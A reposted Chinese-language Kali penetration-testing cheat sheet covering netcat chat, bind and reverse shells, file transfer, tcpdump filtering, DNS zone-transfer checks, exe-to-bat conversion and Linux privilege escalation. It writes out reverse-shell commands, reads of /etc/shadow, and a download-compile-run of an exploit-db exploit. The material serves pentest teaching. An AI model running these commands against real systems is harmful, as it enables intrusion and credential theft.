专栏首页信安之路kali渗透测试工具方法

kali渗透测试工具方法

kali作为一个渗透测试者最受欢迎的操作系统,集成了非常多的安全工具,让渗透测试人员更方便的做一些渗透测试工作,本文来自国外某位大神的github,在这里给大家做一个分享,具体内容如下:

Netcat


netcat是一个优秀的网络工具,在业界有“瑞士军刀”的美誉,通常在Linux系统下都自带了。

测试环境

Kali 192.168.2.10 Windows 192.168.2.12

聊天

Windows nc -nlvp 4444 Kali nc -nv 192.168.2.12 4444

正向shell

Windows nc -nlvp 4444 -e cmd.exe Kali nc -nv 192.168.2.12 4444

反向shell

Windows nc -nlvp 4444 Kali nc -nv 192.168.2.12 4444 -e /bin/bash

文件传输

Windows nc -nlvp 4444 > incoming.exe Kali nc -nv 192.168.2.12 < /usr/share/windows-binnaries/wget.exe

Ncat


Ncat是nmap工具集的一部分,使用如下命令使用Ncat生成一个正向shell:

Windows ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl Linux ncat -nv 192.168.2.12 4444 --ssl

tcpdump


tcpdump是Linux下一个网络包截取分析工具。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。

读取数据包文件

tcpdump -r <capture.pcap>

指定源IP获取数据包文件中的数据

tcpdump -n src host 192.168.2.10 -r <capture.pcap>

指定目的IP获取数据包文件中的数据

tcpdump -n dst host 192.168.2.12 -r <capture.pcap>

指定端口获取数据包文件中的数据

tcpdump -n port 443 -r <capture.pcap>

读取数据包文件并且以16进制显示

tcpdump -nX -r <capture.pcap>

利用host获取dns信息


host是一个用来执行dns查找的小工具。

枚举dns信息

host -t <type> target.com mx = mail server ns = name server

测试dns域传送

host -l target.com <DNS server>

EXE转bat


在某些特殊的情况下需要将exe转为bat,便于上传并执行,下面就是如何使用kali将exe转为bat。

cp /usr/share/windows-binaries/nc.exe /root/ cp /usr/share/windows-binaries/exe2bat.exe /root/ upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt

Linux本地提权


在获得一个webshell之后,一般权限为apache权限,想要进一步的渗透测试需要将自己的权限提升到最高,下面是在Linux下提权使用命令。

ssh user@<target IP> id # 显示用户和组的权限 cat /etc/shadow # 保存的用户的密码,只有root权限可以查看 cat /etc/issue # 查看系统版本信息 uname -a

如何下载并执行提权exp:

wget -O exploit.c http://www.exploit-db.com/download/18411 gcc -o exploit exploit.c # 编译 ./exploit # 执行 id # 查看是否提权成功 cat /etc/shadow # 读取用户密码

总结

这个文章其实有点不想发,但是又没有好文章给大家分享,所以就凑合着给大家看看,毕竟不想浪费今天发文的机会,大家有好的文章不要藏着掖着,发给我有好礼相送呦。

本文分享自微信公众号 - 信安之路(xazlsec),作者:myh0st

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-10-02

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 记一次对 Java 项目的代码审计

    大家好,我是一只安全小菜鸡。老大扔给我一个项目,某项目的java审计。于是我就去进行我“第一次”审计。

    信安之路
  • ret2resolve学习笔记

    一是做个总结,二是做个备份。上篇文章感谢@大米指出的错误,格式化字符串漏洞还未销声匿迹!!!

    信安之路
  • SeLoadDriverPrivilege 在提权中的应用

    我本想翻译学习一下,结果发现安全客已经有人翻译了,我也就没必要翻译了,就复现学习一下吧,顺便算是稍微补充下原文的内容,验证下提权风险。希望能对大家有所帮助。

    信安之路
  • 网络工具中的“瑞士军刀”了解一下?

    前面介绍过一个不可不知的网络命令-netstat,今天来介绍这个网络工具界的“瑞士军刀”-nc(netcat),它短小精悍,是网络调试利器,它到底有何能耐呢?

    编程珠玑
  • 在ASP.NET MVC5中实现具有服务器端过滤、排序和分页的GridView

    背景 在前一篇文章《【初学者指南】在ASP.NET MVC 5中创建GridView》中,我们学习了如何在 ASP.NET MVC 中实现 GridView,类...

    葡萄城控件
  • 谁说程序员不懂幽默?

    小明是一名程序员,某天,他在上班的途中,遇到了一名漂亮的记者,她说要采访小明。 ? 记者:你喜欢你的编程工作吗? 小明:是的,非常喜欢。 (说完这句话,突然感...

    用户1335017
  • Direct3D 11 Tutorial 5: 3D Transformation_Direct3D 11 教程5:3D转型

    在上一个教程中,我们从模型空间到屏幕渲染了一个立方体。 在本教程中,我们将扩展转换的概念并演示可以通过这些转换实现的简单动画。

    Zoctopus
  • 使用keras破解验证码

    jeremyxu
  • Python中的dict

    py3study
  • 如何用一句话证明你是程序员?

    故事是这样的....... 读完故事,请用一句话证明咱是程序员 ? 小明利用假期时间去XX玩,在抵达XX火车站的时候,发现有一个人的脸色特别难看,表情痛苦,小明...

    码神联盟

扫码关注云+社区

领取腾讯云代金券